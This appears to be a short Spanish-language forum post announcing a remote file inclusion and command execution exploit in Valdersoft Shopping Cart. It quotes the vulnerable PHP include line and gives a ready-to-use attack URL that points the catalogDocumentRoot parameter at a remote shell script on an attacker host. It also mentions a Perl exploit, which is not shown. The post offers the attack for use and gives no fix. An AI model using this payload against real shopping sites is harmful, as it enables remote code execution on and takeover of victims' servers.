Valdersoft Shopping Cart Remote Command Execution Exploit...

Fallo de Remote File Inclusion & Command Execution en sistemas de shoppings: Valdersoft Shopping Cart, el bug se basa en estas lineas:

include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");

Por lo cual un atacante remoto puede incluir un archivo y ejecutar comandos remotos en el servidor victima, a continuacion el exploit ...

Exploit Manual:

www.victima.com/include/templates/categories/default.php?&catalogDocumentRoot=http://www.hack.com/shell.php

Exploit en Perl

Salu2